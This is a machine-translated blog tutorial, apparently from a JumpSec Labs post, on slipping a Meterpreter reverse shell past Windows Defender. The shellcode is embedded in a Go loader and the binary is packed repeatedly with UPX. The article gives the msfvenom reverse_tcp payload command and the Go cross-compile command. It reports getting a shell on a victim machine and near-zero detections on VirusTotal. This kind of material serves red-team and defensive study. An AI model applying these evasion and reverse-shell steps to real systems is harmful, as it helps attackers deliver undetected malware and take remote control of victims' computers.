Bypass AV with golang

In this article , I will introduce a cool trick in detail , It involves how to bypass most anti-virus products to obtain Metepreter reverse shell.

It all started with Golang Compiling Github When Repository , The repository will shellcode Inject into the running process .

https://github.com/brimstone/go-shellcode

By simply using msfvenom Generate payload , We tested it , Find out Windows Defender This payload can be easily detected .Meterpreter The payload generation is as follows ：

msfvenom -p Windows / x64 / meterpreter / reverse_tcp LHOST = xxxx LPORT = xxx -b \ x00 -f hex

Use Go The advantages of this experiment are , You can change it from Linux Host cross compilation as the target Windows host . The command to compile the application is :

GOOS=windows GOARCH=amd64 go build

This will produce a Go exe file , This file will be on the command line with what the attacker wants to inject shellcode Do it together .

This is easy to detect ,Windows Defender There is no difficulty in identifying it as Meterpreter. For fast , Easily bypass , We try to use UPX Brute force cracking executable , Compress it repeatedly 8 Time .Windows Defender Catch it again , There is no luck here .

Try to use shellcode Run as a parameter Go exe file .

As usual ,Windows Defender It can be easily detected . then , We try to use UPX Compression of the sc.exe file , The file is also invalid .

Of course ,Windows Defender Once the process is detected , It will end Meterpreter conversation .

From here , Checked Go The source code of the program . After a review , Found can be modified main.go Source file to shellcode As a variable and then compile – Instead of compiling .exe, And then shellcode Add... As a command line parameter .

go-shellcode/cmd/sc/main.go source

The modified

go-shellcode/cmd/sc/main.go source

Where the reference to the command line parameter is replaced by the declared variable .

Use these files , Compiled two .exe file , One of them should not be used UPX Test under compression , And the other one will be UPX Test under compression .Windows Defender Touch the disk , The uncompressed version will be detected immediately , But it will not be detected by static analysis UPX Compression of the .exe.

Windows Defender Immediately detected no UPX Compression of the .exe contain Meterpreter Payload .

however , Run custom UPX Compression of the .exe File successfully , And realize the reverse Shell

Running successfully UPX Compression of the Go exe file , And got the reverse shell on the victim's computer .

Let's focus on VT Run it , To check its immunity .

take UPX Compression of the Go exe File upload to Virus Total. Only Cybereason and Cylance Detect the file as a malicious file .

Only two anti-virus engines found malicious loads in this file , And neither of them specifies whether the upload is malicious , It's just malicious .UPX Compression may be the cause of the alarm , because UPX Compression can be used to confuse malicious files .

In the mode of violence UPX Compression will exe File compression 8 Time .

The original text is translated to

https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher-it/

Reference article

https://github.com/brimstone/go-shellcode
https://boyter.org/posts/trimming-golang-binary-fat/
https://blog.filippo.io/shrink-your-go-binaries-with-this-one-weird-trick/